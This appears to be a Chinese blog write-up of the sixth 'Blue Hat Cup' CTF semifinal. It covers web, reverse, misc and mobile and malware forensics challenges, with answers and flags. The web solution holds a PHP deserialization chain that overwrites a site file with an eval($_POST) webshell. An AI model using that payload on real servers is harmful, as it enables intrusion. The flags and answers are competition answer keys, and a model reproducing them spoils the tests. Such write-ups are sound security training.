当前位置:网站首页>第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛

第六届”蓝帽杯“全国大学生网络安全技能大赛 半决赛

2022-08-09 12:29:00 Pysnow

总榜38,地区第四: )

CTF

web

easyfatfree:

www.zip 下载源码,这又是一道原题,wmctf2020 那个 rce 链子能用,但是因为 disable_fucntion 禁用得太狠了,代码执行也没什么办法,可以直接用 2020ciscn 拿到 easyunserialze 的写文件链子,(没有写文件的权限但是有覆盖文件的权限) 覆盖任意一个 php 文件,然后蚁剑连上就可以拿到 flag 了,因为蚁剑自带绕过 open_basir 的功能,给出 exp 如下https://blog.csdn.net/mochu7777777/article/details/108327699

<?php
  namespace DB;

//! In-memory/flat-file DB wrapper
class Jig {
    

  //@{ Storage formats
  const
    FORMAT_JSON=0,
  FORMAT_Serialized=1;
  //@}
  protected
    //! Storage location
    $dir = '/var/www/html/',
  //! Current storage format
  $format = 'self::FORMAT_JSON',
  //! Memory-held data
  $data = array('lib/utf.php'=>array("a'=>'<?php eval(\$_POST['p']); ?>")),
  //! lazy load/save files
  $lazy = TRUE;

  /** * Read data from memory/file * @return array * @param $file string **/
}
$jig = new jig();
echo urlencode(serialize($jig));

图片.png
图片.png图片.png

re

babynim

** 大数相除** **
image.png
除数
56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471
image.png被除数

**51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801

a = 56006392793428440965060594343955737638876552919041519193476344215226028549209672868995436445345986471
b = 51748409119571493927314047697799213641286278894049840228804594223988372501782894889443165173295123444031074892600769905627166718788675801
print(b//a)

flag{923973256239481267349126498121231231}

misc

神秘的日志

日志搜索 NTLM,发现有两个
图片.png
图片.png图片.png有两个时间点**
2022/4/17 11:27:06
2022/4/16 17:31:01
**在 security 日志中找到那个时间点的 NTLM,有五个,导出如下

图片.png一个一个 flag 试,发现最后一个 flag 提交正确**
**图片.png
flag:flag{dafd0428f634aefd1ddb26f8257c791f}

取证

手机取证_1

** iPhone 手机的 iBoot 固件版本号:(答案参考格式:iBoot-1.1.1)** **
用盘古石手机取证系统导入 iPhone 文件夹,查看设备信息,找到 iBoot 固件版本号。
**图片.pngflag:iBoot-7429.62.1

exe 分析_1

image.png
将程序拖进微步云沙箱,可以看到启动进程位置
C:\Program Files\Common Files\Services\WmiApSvr.exe

exe 分析_2

拖进 ida 就可以看到导入 dll
image.png
答案是:是

exe 分析_3

用 x32dbg 调试程序
image.png
image.png
查看进程的详细信息就可以找到程序名

exe 分析_4

在微步云沙箱搜索文件的哈希值即文件名
image.png
挖矿程序

exe 分析_5

在虚拟机运行起来,通过 wireshark 看到一个 ip,查询位置
image.png
韩国

APK 分析_01

** 受害人手机中 exec 的序列号是:(答案参考格式:0xadc)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,模糊搜索 exec,找到应用,导出到桌面。
图片.png用 jadx-gui 打开 apk,查看证书,找到序列号。
**图片.pngflag:0x936eacbe07f201df

APK 分析_02

** 受害人手机中 exec 关联服务器地址是:(答案参考格式:asd.as.d)** **
** 使用 Jadx 分析 apk,首先看 MainActivity 主函数,发现有一个 Base64 加密后的密文,解密后得到明文: https://ansjk.ecxeio.xyz
** 分析代码发现这个加密算法是在 t( ) 方法里的,查找 t( ) 方法哪里被引用了,发现没有引用的地方,只能换个思路。t( ) 方法所在的 MainActivity 类继承 h 类,分析 h 类。** **
图片.png
图片.png
** 发现 t( ) 方法在 h 类中是一个抽象方法(没有方法体,只有声明。抽象方法的具体的实现在子类中,即 MainActivity 类里),随后又发现 loadUrl( ) 方法调用了 t( ) 方法。
**
**图片.png
** 说明 loadUrl( ) 加载了 t( ) 里的 https://ansjk.ecxeio.xyz,说明程序的服务器地址就是 t() 方法里的网址。
**flag:ansjk.ecxeio.xyz

APK 分析_03

** 受害人手机中 exec 加载服务器的函数是 :(答案参考格式:asda)** **
根据 APK 分析_02 的分析可知:exec 加载服务器的函数应该是:loadUrl( )
**flag:loadUrl

APK 分析_04

** 受害人手机中 exec 的打包 ID 是:(答案参考格式:adb.adb.cn)** **
根据答案参考格式,猜测 ID 是个网址,将文件拖进 AndroidKiller 里查看,搜索.cn,发现一个网址字符串。
图片.png提交正确。
**flag:W2Anansjy.com.cn

APK 分析_05

** 受害人手机中 exec 的是否有安全检测行为?** **
查找字符串"安全",发现有检测手机 root 的提示,说明有安全检测。
**图片.png
flag:是

APK 分析_06

** 受害人手机中 exec 的检测方法的完整路径和方法名是:(答案参考格式:a.a.a())** **
** 找到字符串,所在方法是所在类 h,分析代码结合 MainActivity 主类中的方法,发现 h 类其实就是 MainActivity,程序将它单独拿出来了,MainActivity( ) 通过继承的方式进行调用,h 类实际是一个开发业务逻辑的类。** **
图片.png
图片.png
** 既然是开发业务逻辑的类,必然有安全检测的方法,分析代码,发现 onCreate() 方法中有安全检测,并有安全提醒的字符串。着重分析 onCreate() 方法中有安全提醒字符串这一部分。分析发现每一个安全提醒的字符串触发都是通过一个 if 判断,这个 if 判断条件里的方法都是 a 类中的方法,怀疑 a 类就是安全检测的类,跟进 a 类。** **
图片.png
** 根据 a 类中的方法名,变量名可知,该类就是安全检测的类。
**
**flag:d.a.a.c.a.a()

APK 分析_07

** 受害人手机中 exec 有几个界面:(答案参考格式:2)** **
一个 APK 每创建一个界面(Activity),都要在 AndroidManifest.xml 中注册,查看 AndroidManifest.xml。
图片.png发现注册了三个 activity,activity-alias 是为 activity 起了个别名,也就是说 com.kmcjrz.bsesai.newActivity 实际指的就是 minmtta.hemjcbm.ahibyws.MainActivity。
**图片.pngflag:3

APK 分析_08

** 受害人手机中红星 IPA 的包名是:(答案参考格式:a.s.d)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,搜索红星,找到文件,导出。
图片.png搜索可知 IPA 是 Apple 程序应用文件 iPhoneApplication 的缩写,简单来说就是 Apple 程序的 APK,实质还是一个压缩包,解压红星.ipa。
**图片.png
IPA 文件解压器解压,得到 ayload 文件,打开 Payload 文件,里面有对应的.app 文件,搜索 info.plist 文件,用 plist Editor 查看,搜索 bundle,找到包名。
图片.pngflag:com.dd666.hongxin

APK 分析_09

** 受害人手机中红星 IPA 的 APIKEY 是:(答案参考格式:asd)** **
在 info.plist 文件中,搜索 APIKEY 找到内容。
**图片.pngflag:d395159c291c627c9d4ff9139bf8f0a700b98732

APK 分析_10

** 受害人手机中红星 IPA 的权限有哪些?** **
在 info.plist 文件中,寻找有关权限内容,发现四个权限申请。
**图片.png
flag:相册,定位,摄像头,麦克风

APK 分析_11

** 嫌疑人手机中红星 APK 的服务器地址是:(答案参考格式:ass.a.d:11)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,搜索红星,找到文件,导出。
图片.png跟据提示要求寻找服务器网址,搜索字符串:“url”,发现与题目格式相一致的网址。
图片.png提交正确。
**flag:www.nansjy.com.cn:8161

APK 分析_12

** 嫌疑人手机中红星 APK 的程序入口是:(答案参考格式:a.v.b.n)** **
用 Android Killer 打开红星.apk,找到红星 APK 的程序入口名。
**图片.png
flag:com.example.weisitas526sad.activity.SplashActivity

APK 分析_13

** 嫌疑人手机中分析聊天工具,服务器的登录端口是:(答案参考格式:12)** **
用盘古石手机取证系统导入受害人 Android 手机镜像,打开应用列表,寻找聊天应用,发现应用 BigAnt5 疑似聊天工具。
图片.png网上搜索可得 BigAnt5 是聊天软件,搜索 BigAnt5 端口号。
**图片.png
搜索可得 BigAnt5 端口号为 6661。
图片.png
flag:6661

服务器取证_05

图片.png图片.png通过观察我博客的宝塔面板,可以发现宝塔下载的软件存在于两个地方,/www/server 和/www/server/panel/plugin 这两个文件夹下,然后出去那几个不是软件的文件,计算出来如下**
**图片.png图片.png
linuxsys webshh mysql nginx php phpmyadmin
答案:6

服务器取证_15

图片.png计算机取证,搜索关键词你好**
在此基础上搜索 怎么充值
图片.png找到一个数据库备份文件,然后导出打开它图片.png搜索关键词找到用户名为
**图片.png答案:hm688

原网站

版权声明
本文为[Pysnow]所创,转载请带上原文链接,感谢
https://blog.csdn.net/not_code_god/article/details/126199335